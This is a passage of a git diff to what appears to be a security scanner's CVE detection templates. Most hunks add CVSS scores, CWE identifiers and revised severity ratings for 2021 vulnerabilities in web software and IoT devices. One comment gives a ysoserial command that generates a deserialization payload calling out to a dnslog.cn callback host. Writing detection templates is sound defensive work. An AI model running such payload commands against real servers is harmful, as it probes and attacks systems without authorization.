CVE-2021-24472 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml index 4a5b9a1610..19e4bf5b0d 100644 --- a/cves/2021/CVE-2021-24495.yaml +++ b/cves/2021/CVE-2021-24495.yaml @@ -9,6 +9,11 @@ info: reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml index 64eccc35f9..249ee3cb41 100644 --- a/cves/2021/CVE-2021-24498.yaml +++ b/cves/2021/CVE-2021-24498.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2021,xss,wordpress,wp-plugin reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24498 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml index 9b24744f57..3636534b7b 100644 --- a/cves/2021/CVE-2021-25281.yaml +++ b/cves/2021/CVE-2021-25281.yaml @@ -7,6 +7,11 @@ info: reference: http://hackdig.com/02/hack-283902.htm description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. tags: cve,cve2021,saltapi,rce,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-25281 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index ca62a13683..6c596f1aad 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -3,12 +3,17 @@ id: CVE-2021-25646 info: name: Apache Druid RCE author: pikpikcu - severity: critical + severity: high reference: https://paper.seebug.org/1476/ description: | Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. tags: cve,cve2021,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-25646 + cwe-id: CWE-732 requests: - raw: diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 54134b92e1..223055583e 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -11,6 +11,11 @@ info: - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml index d0462007ca..b1cf4c5442 100644 --- a/cves/2021/CVE-2021-26086.yaml +++ b/cves/2021/CVE-2021-26086.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-72695 - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 tags: cve,cve2021,jira,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-26086 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index cef67180f6..ab08b76304 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -13,6 +13,11 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26295 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml index bc9d4332f5..197a0e35f5 100644 --- a/cves/2021/CVE-2021-26475.yaml +++ b/cves/2021/CVE-2021-26475.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf severity: medium tags: cve,cve2021,xss,eprints + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26475 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml index ed5fc3662d..df2e680cab 100644 --- a/cves/2021/CVE-2021-26710.yaml +++ b/cves/2021/CVE-2021-26710.yaml @@ -7,6 +7,11 @@ info: description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. reference: https://vict0ni.me/report2web-xss-frame-injection.html tags: cve,cve2021,redwood,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26710 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml index 3b867adacd..72c53cc241 100644 --- a/cves/2021/CVE-2021-26722.yaml +++ b/cves/2021/CVE-2021-26722.yaml @@ -7,6 +7,11 @@ info: description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. reference: https://github.com/linkedin/oncall/issues/341 tags: cve,cve2021,linkedin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26722 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml index 7358094f07..8372fc51ee 100644 --- a/cves/2021/CVE-2021-26723.yaml +++ b/cves/2021/CVE-2021-26723.yaml @@ -11,6 +11,11 @@ info: - https://jenzabar.com/blog - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328 tags: cve,cve2021,jenzabar,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26723 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index 032841467b..e8d74a17dc 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-26812 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index 2b7a25ea5d..f2b5e87856 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -12,6 +12,10 @@ info: - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26855 requests: - raw: diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index 0f16811c2a..5718543b60 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -3,9 +3,17 @@ id: CVE-2021-27132 info: name: CRLF Injection - Sercomm VD625 author: geeknik - severity: medium + severity: critical description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27132 + cwe-id: CWE-74 + reference: + - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + - http://sercomm.com requests: - method: GET diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml index b356cf909a..4f26fcca3a 100644 --- a/cves/2021/CVE-2021-27330.yaml +++ b/cves/2021/CVE-2021-27330.yaml @@ -7,6 +7,11 @@ info: description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents. reference: https://www.exploit-db.com/exploits/49597 tags: cve,cve2021,triconsole,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-27330 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml index 0b53b90095..0bd9968499 100644 --- a/cves/2021/CVE-2021-27651.yaml +++ b/cves/2021/CVE-2021-27651.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 severity: critical tags: cve,cve2021,pega,auth-bypass + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27651 + cwe-id: CWE-287,CWE-640 requests: - method: GET diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml index cba085815d..44b1b651c3 100644 --- a/cves/2021/CVE-2021-27850.yaml +++ b/cves/2021/CVE-2021-27850.yaml @@ -9,6 +9,11 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-27850 tags: cve,cve2021,apache,tapestry + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27850 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml index b14c3ad7df..7d28fe62e8 100644 --- a/cves/2021/CVE-2021-27905.yaml +++ b/cves/2021/CVE-2021-27905.yaml @@ -3,7 +3,7 @@ id: CVE-2021-27905 info: name: Apache Solr <= 8.8.1 SSRF author: hackergautam - severity: medium + severity: critical tags: cve,cve2021,apache,solr,ssrf description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. reference: @@ -11,6 +11,11 @@ info: - https://ubuntu.com/security/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml index 33dd3f51b9..5529e9a825 100644 --- a/cves/2021/CVE-2021-28149.yaml +++ b/cves/2021/CVE-2021-28149.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 tags: cve,cve2021,hongdian,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2021-28149 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index b16d0b19a0..0970614363 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -9,6 +9,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2021-28150 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2021/CVE-2021-28151.yaml b/cves/2021/CVE-2021-28151.yaml index 34b2b86083..60ffa8230b 100644 --- a/cves/2021/CVE-2021-28151.yaml +++ b/cves/2021/CVE-2021-28151.yaml @@ -10,6 +10,11 @@ info: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-28151 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-28164.yaml b/cves/2021/CVE-2021-28164.yaml index 40408c866b..35d226536b 100644 --- a/cves/2021/CVE-2021-28164.yaml +++ b/cves/2021/CVE-2021-28164.yaml @@ -10,6 +10,11 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28164 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28169.yaml b/cves/2021/CVE-2021-28169.yaml index e88a103bc6..2c4b5ba010 100644 --- a/cves/2021/CVE-2021-28169.yaml +++ b/cves/2021/CVE-2021-28169.yaml @@ -10,6 +10,11 @@ info: description: | For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-28169 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index d591e23f66..ae168da091 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -10,6 +10,11 @@ info: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2021-28918 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2021/CVE-2021-28937.yaml b/cves/2021/CVE-2021-28937.yaml index 30132099ca..7c00cd061c 100644 --- a/cves/2021/CVE-2021-28937.yaml +++ b/cves/2021/CVE-2021-28937.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 - severity: medium + severity: high tags: cve,cve2021,acexy,disclosure,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-28937 + cwe-id: CWE-312 requests: - method: GET diff --git a/cves/2021/CVE-2021-29156.yaml b/cves/2021/CVE-2021-29156.yaml index b92aededf1..976a0d7a51 100644 --- a/cves/2021/CVE-2021-29156.yaml +++ b/cves/2021/CVE-2021-29156.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2021,openam description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. reference: https://blog.cybercastle.io/ldap-injection-in-openam/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29156 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 46e6805abe..4a1d38914d 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29203 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml index ac947cde4f..87203f1c21 100644 --- a/cves/2021/CVE-2021-29441.yaml +++ b/cves/2021/CVE-2021-29441.yaml @@ -11,9 +11,14 @@ info: This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. author: dwisiswant0 - severity: high + severity: critical reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-29441 + cwe-id: CWE-290 requests: - raw: diff --git a/cves/2021/CVE-2021-29442.yaml b/cves/2021/CVE-2021-29442.yaml index 81a6d3fc5d..7b61103f73 100644 --- a/cves/2021/CVE-2021-29442.yaml +++ b/cves/2021/CVE-2021-29442.yaml @@ -10,6 +10,11 @@ info: severity: high reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ tags: nacos,auth-bypass,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-29442 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 51791de0f0..c76ead0c70 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-29622.yaml b/cves/2021/CVE-2021-29622.yaml index ff5a0b4b8a..95b34e9478 100644 --- a/cves/2021/CVE-2021-29622.yaml +++ b/cves/2021/CVE-2021-29622.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 severity: medium tags: cve,cve2021,prometheus,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29622 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml index 26175c05d3..d5e3bd655d 100644 --- a/cves/2021/CVE-2021-29625.yaml +++ b/cves/2021/CVE-2021-29625.yaml @@ -9,6 +9,11 @@ info: - https://sourceforge.net/p/adminer/bugs-and-features/797/ - https://www.cvedetails.com/cve/CVE-2021-29625/ tags: cve,cve2021,adminer,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-29625 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 5b47b94607..c1251e9592 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -3,12 +3,17 @@ id: CVE-2021-30151 info: name: CVE-2021-30151 author: DhiyaneshDk - severity: low + severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss,sidekiq + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-30151 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0168388bab..5a60c6d460 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -9,6 +9,10 @@ info: - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 tags: cve,cve2021,exposure,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3017 requests: - method: GET diff --git a/cves/2021/CVE-2021-3019.yaml b/cves/2021/CVE-2021-3019.yaml index 67895708da..c642949eea 100644 --- a/cves/2021/CVE-2021-3019.yaml +++ b/cves/2021/CVE-2021-3019.yaml @@ -3,12 +3,17 @@ id: CVE-2021-3019 info: name: Lanproxy Directory Traversal author: pikpikcu - severity: medium + severity: high description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet. reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 tags: cve,cve2021,lanproxy,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3019 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-30461.yaml b/cves/2021/CVE-2021-30461.yaml index 6de9e167ab..a5bbb3a5a1 100644 --- a/cves/2021/CVE-2021-30461.yaml +++ b/cves/2021/CVE-2021-30461.yaml @@ -7,6 +7,11 @@ info: description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-30461 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2021/CVE-2021-31249.yaml b/cves/2021/CVE-2021-31249.yaml index 64112f9e82..f25315a536 100644 --- a/cves/2021/CVE-2021-31249.yaml +++ b/cves/2021/CVE-2021-31249.yaml @@ -7,6 +7,10 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 severity: medium tags: cve,cve2021,chiyu,crlf,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2021-31249 requests: - method: GET diff --git a/cves/2021/CVE-2021-31250.yaml b/cves/2021/CVE-2021-31250.yaml index f03536d032..da104e45c7 100644 --- a/cves/2021/CVE-2021-31250.yaml +++ b/cves/2021/CVE-2021-31250.yaml @@ -7,6 +7,11 @@ info: reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 severity: medium tags: cve,cve2021,chiyu,xss,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-31250 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 8a0135ebcb..30d25808bb 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -9,6 +9,10 @@ info: - https://www.ambionics.io/blog/laravel-debug-rce - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 tags: cve,cve2021,laravel,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3129 requests: - raw: diff --git a/cves/2021/CVE-2021-31537.yaml b/cves/2021/CVE-2021-31537.yaml index 0e40527eea..10abaf9ffe 100644 --- a/cves/2021/CVE-2021-31537.yaml +++ b/cves/2021/CVE-2021-31537.yaml @@ -7,6 +7,11 @@ info: reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ severity: medium tags: cve,cve2021,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-31537 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml index 4239a6763e..9da45f7140 100644 --- a/cves/2021/CVE-2021-31581.yaml +++ b/cves/2021/CVE-2021-31581.yaml @@ -8,6 +8,12 @@ info: - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ severity: medium tags: cve,cve2021,akkadian,mariadb,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.40 + cve-id: CVE-2021-31581 + cwe-id: CWE-312 + description: "The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later)." requests: - method: GET diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 71be85cd28..66ef428473 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -9,6 +9,11 @@ info: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai tags: cve,cve2021,tenda,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31755 + cwe-id: CWE-787 requests: - raw: diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml index deb18ee2f2..86cd3cb7a1 100644 --- a/cves/2021/CVE-2021-31856.yaml +++ b/cves/2021/CVE-2021-31856.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ssst0n3/CVE-2021-31856 - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 tags: sqli,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 requests: - method: GET diff --git 